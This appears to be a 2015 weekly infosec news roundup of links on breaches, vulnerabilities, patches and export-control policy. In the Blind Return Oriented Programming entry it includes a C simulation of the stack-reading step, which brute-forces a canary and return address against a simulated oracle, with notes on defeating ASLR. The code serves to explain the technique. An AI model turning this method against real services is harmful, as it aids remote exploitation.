Resources
- HackerOne Connects Hackers With Companies, and Hopes for a Win-Win – nytimes.com
HackerOne is a San Francisco tech start-up that aims to become a mediator between companies with cybersecurity issues and hackers who are looking to solve problems rather than cause them. It hopes to persuade hackers to responsibly report security flaws rather than exploit them, and to connect those “white hats” with companies willing to pay a bounty for their finds.
- A DBIR Attack Graph Web App! – securityblog.verizonenterprise.com
The DBIR Attack Graph Web App is meant to make analyzing DBIR attack graphs simple enough that anyone can do it. To learn about the app, watch the tutorial video here.
- AppSecEU 2015 – youtube.com
These are the videos from AppSec Europe 2015 in Amsterdam, Netherlands. You can watch and download the videos from here.
- ShowMeCon 2015 Videos – irongeek.com
These are the videos from ShowMeCon 2015. You can watch and download the videos from here.
- What exactly is Duqu 2.0? – community.rapid7.com
Duqu, a very complex and modular malware platform thought to have gone dark in late 2012, has reappeared inside the environment of Kaspersky Lab. Dubbed “Duqu 2.0” by Kaspersky, the malware's complexity reflects the level of sophistication, skill, funding and motivation typically seen from nation-state-sponsored actors.
- Wassenaar Arrangement – Frequently Asked Questions – community.rapid7.com
The purpose of this post is to help answer questions about the Wassenaar Arrangement. You can find the US proposal for implementing the Arrangement and an accompanying FAQ from the Bureau of Industry and Security (BIS) here.
- Response to the US Proposal for Implementing the Wassenaar Arrangement Export Controls for Intrusion Software – community.rapid7.com
On May 20th 2015, the Bureau of Industry and Security (BIS) published its proposal for implementing new export controls under the Wassenaar Arrangement.
Tools
- NOPC version 0.4.5 released – labs.portcullis.co.uk
NOPC, the Nessus-based offline Unix patch checker, has been updated and made available in the tools section. This article discusses the new features in detail and provides some working examples.
Techniques
- Blind Return Oriented Programming – nccgroup.trust
This post walks through some of the important steps of Blind Return Oriented Programming (BROP), a state-of-the-art exploitation technique for attacking a remote service when the attacker has no copy of the binary.
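As an added illustration of the step BROP begins with, stack reading, here is a small C simulation. It is not code from the NCC Group post or from the BROP paper. BROP targets services that fork a child per connection without re-executing, so every child inherits the same stack canary and return addresses; the attacker overflows the buffer one extra byte at a time, tries all 256 values for that byte, and keeps the one that does not crash the child. The `TARGET_STACK` contents and the in-process `probe()` oracle below are constructed stand-ins for the real server and its crash/no-crash signal over the network.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the bytes that sit above the overflowed buffer in
 * the target's stack frame: an 8-byte stack canary followed by an 8-byte saved
 * return address (little-endian). The canary's lowest byte is 0x00, as glibc
 * sets it on x86-64. These values are invented for this example and are
 * treated as unknown by the attacker-side code below. */
static const uint8_t TARGET_STACK[16] = {
    0x00, 0x9f, 0x3a, 0xc4, 0x11, 0xe7, 0x52, 0x8d, /* canary           */
    0x6a, 0x12, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00  /* retaddr 0x40126a */
};

/* Oracle standing in for one connection to a forking server. The attacker's
 * request overflows the buffer by exactly `len` bytes; the child survives
 * (returns 1) only if every overwritten byte matches what was there, and
 * "crashes" (returns 0) otherwise. In a real BROP attack this is a network
 * round trip, and the signal is whether the connection stays open. Because
 * fork() copies the parent, every child has the same canary and addresses. */
static int probe(const uint8_t *guess, size_t len) {
    if (len > sizeof TARGET_STACK)
        return 0;
    return memcmp(guess, TARGET_STACK, len) == 0;
}

/* Stack reading: recover `n` bytes one position at a time. For each position
 * try all 256 values, keeping the one the server tolerates, so the cost is
 * at most 256 * n probes instead of 256^n. Returns the number of probes used,
 * or 0 if no value was accepted at some position. */
size_t stack_read(uint8_t *out, size_t n) {
    size_t probes = 0;
    for (size_t i = 0; i < n; i++) {
        int found = 0;
        for (int v = 0; v < 256; v++) {
            out[i] = (uint8_t)v;
            probes++;
            if (probe(out, i + 1)) {
                found = 1;
                break;
            }
        }
        if (!found)
            return 0;
    }
    return probes;
}

/* Assemble 8 recovered bytes into the little-endian value they represent. */
uint64_t le64(const uint8_t *p) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | p[i];
    return v;
}

int main(void) {
    uint8_t leaked[16];
    size_t probes = stack_read(leaked, sizeof leaked);
    if (probes == 0) {
        puts("stack read failed");
        return 1;
    }
    printf("canary  = 0x%016llx\n", (unsigned long long)le64(leaked));
    printf("retaddr = 0x%016llx\n", (unsigned long long)le64(leaked + 8));
    printf("probes  = %zu (worst case %zu)\n", probes,
           (size_t)256 * sizeof leaked);
    return 0;
}
```

The leaked return address is what defeats PIE and ASLR for the rest of the attack: it gives the attacker a known address inside the text segment from which the later BROP steps (locating a stop gadget, the BROP gadget, and eventually `write` to dump the binary) can scan. Against a real service the oracle is noisy, so a production implementation retries a byte when the connection result is ambiguous rather than trusting a single probe.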
Vendor/Software patches
- Escaping VMware Workstation through COM1 – docs.google.com
These bugs are subject to a 90-day disclosure deadline. If 90 days elapse without a broadly available patch, the bug report will be made available to the public.
- PowerShell ♥ the Blue Team – blogs.msdn.com
In this post, the PowerShell team discusses some important advances they have made in scripting security and protection in the preview versions of PowerShell version 5 and Windows 10.
- Adobe, Microsoft Issue Critical Security Fixes – krebsonsecurity.com
Adobe released software updates to plug at least 13 security holes in its Flash Player software. Separately, Microsoft pushed out fixes for at least three dozen flaws in Windows and associated software.
Vulnerabilities
- This code can hack nearly every credit card machine in the country – money.cnn.com
An attacker can gain complete control of a store’s credit card readers, potentially allowing them to hack into the machines and steal customers’ payment data. This latest discovery comes from researchers at Trustwave, a cybersecurity firm.
- Kaspersky Lab cybersecurity firm is hacked – bbc.com
One of the leading anti-virus software providers has revealed that its own systems were recently compromised by hackers. Kaspersky Lab said it believed the attack was designed to spy on its newest technologies.
- Security Advisory: Object Injection Vulnerability in WooCommerce – blog.sucuri.net
During a routine audit for Sucuri’s WAF, the researchers discovered a dangerous Object Injection vulnerability which could, in certain contexts, be used by an attacker to download any file on the vulnerable server.
- Serious iOS bug makes it easy to steal users’ iCloud passwords – arstechnica.com
A security researcher has published attack code he said makes it easy to steal the iCloud passwords of people using the latest version of Apple iOS for iPhones and iPads. The researcher’s proof-of-concept code demonstrates how the attack works.
Other News
- Union: Hackers have personnel data on every federal employee – bigstory.ap.org
Hackers stole personnel data and Social Security numbers for every federal employee, a government worker union said Thursday, asserting that the cyber theft of U.S. employee information was more damaging than the Obama administration has acknowledged.
- Why this security breach is worse than all the others combined – caseysoftware.com
The second OPM database that was breached contains sensitive background check information, called SF-86 data, that includes applicants’ financial histories and investment records, and children’s and relatives’ names.
- Chinese hack of federal personnel files included security-clearance database – washingtonpost.com
The massive data breach of the records of current and former federal employees is believed to be worse than first thought.
- CIA releases secret report identifying errors before 9/11 – thehill.com
After a decade of secrecy, the CIA on Friday released a nearly 500-page inspector general report outlining multiple “systemic problems” in the nation’s spy agencies ahead of the terror attacks on Sept. 11, 2001.
[…] post Week 24 In Review – 2015 appeared first on Infosec […]